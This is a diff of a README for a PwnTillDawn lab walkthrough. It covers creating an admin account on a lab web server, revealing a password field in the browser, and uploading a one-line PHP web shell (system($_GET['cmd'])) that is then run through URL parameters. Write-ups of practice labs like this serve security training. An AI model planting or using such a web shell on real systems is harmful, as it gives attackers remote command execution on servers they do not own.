MeerTrayed/Pwntilldawn-Lab3/README.md

 4. Inside http://10.150.150.11, there's a decent directory to get into, which is the addedituser.php Create a user with an admin role
-   (Picture)

-  Extra: Access to admin account using simple tricks.
+  Extra: Access to admin account using simple tricks (Inspect Q). change type=password into type=text (Picture)
-  (Picture)

 5. Create a simple webshell to run commands through the browser.
    `<?php system($_GET['cmd']); ?>` save it as "shell.php"
    Afterward, upload it into your accounts.
+   (Picture)

-6. Uploading the files into the new folder http://10.150.150.11/upload/12 Reason to run the PHP file on the web. http://10.150.150.11/upload/12/shell.php http://10.150.150.11/upload/12/shell.php?cmd=hostname
+7. Force uploading the files into the new folder of http://10.150.150.11/upload/12 Reason to run the PHP file on the web. http://10.150.150.11/upload/12/shell.php http://10.150.150.11/upload/12/shell.php?cmd=hostname